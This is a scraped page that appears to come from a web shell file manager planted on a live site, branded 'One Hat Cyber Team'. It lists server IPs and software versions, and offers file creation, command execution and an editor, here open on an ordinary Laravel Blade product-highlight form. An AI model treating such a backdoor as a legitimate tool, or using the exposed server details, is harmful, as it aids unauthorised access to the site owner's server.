One Hat Cyber Team
Your IP :
3.135.209.247
Server IP :
104.21.48.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
forge
/
gftag.com
/
resources
/
views
/
back
/
item
/
Edit File:
highlight.blade.php
@extends('master.back') @section('styles') <link rel="stylesheet" href="{{asset('assets/back/css/datepicker.css')}}"> @endsection @section('content') <div class="container-fluid"> <!-- Page Heading --> <div class="card mb-4"> <div class="card-body"> <div class="d-sm-flex align-items-center justify-content-between"> <h3 class="mb-0 bc-title"><b>{{ __('Highlight Product') }}</b></h3> <a class="btn btn-primary btn-sm" href="{{route('back.item.index')}}"><i class="fas fa-chevron-left"></i> {{ __('Back') }}</a> </div> </div> </div> <!-- Form --> <div class="row"> <div class="col-xl-12 col-lg-12 col-md-12"> <!-- Form --> <div class="row"> <div class="col-xl-12 col-lg-12 col-md-12"> <div class="card o-hidden border-0 shadow-lg"> <div class="card-body "> <!-- Nested Row within Card Body --> <div class="row justify-content-center"> <div class="col-lg-12"> <form class="admin-form" action="{{ route('back.item.highlight.update',$item->id) }}" method="POST" enctype="multipart/form-data"> @csrf @method('POST') @include('alerts.alerts') <div class="form-group"> <label for="is_type">{{ __('Select Type') }} *</label> <select name="is_type" id="is_type" class="form-control" > <option value="undefine" {{$item->is_type == 'undefine' ? 'selected' : ''}}>{{ __('Undefine Product') }}</option> <option value="new" {{$item->is_type == 'new' ? 'selected' : ''}} >{{ __('New Arrival') }}</option> <option value="feature" {{$item->is_type == 'feature' ? 'selected' : ''}} >{{ __('Feature Product') }}</option> <option value="top" {{$item->is_type == 'top' ? 'selected' : ''}} >{{ __('Top Product') }}</option> <option value="best" {{$item->is_type == 'best' ? 'selected' : ''}} >{{ __('Best Product') }}</option> <option value="flash_deal" {{$item->is_type == 'flash_deal' ? 'selected' : ''}} >{{ __('Flash Deal Product') }}</option> </select> </div> <div class="form-group show-datepicker {{$item->is_type =='flash_deal' ? '' : 'd-none'}}"> <label for="slug">{{ __('Enter Date') }} *</label> <input type="text" name="date" class="form-control datepicker" id="datepicker" id="slug" placeholder="{{ __('Enter Date') }}" value="{{ $item->date }}" > </div> <div class="form-group"> <button type="submit" class="btn btn-secondary ">{{ __('Submit') }}</button> </div> <div> </form> </div> </div> </div> </div> </div> </div> </div> </div> </div> @endsection
Simpan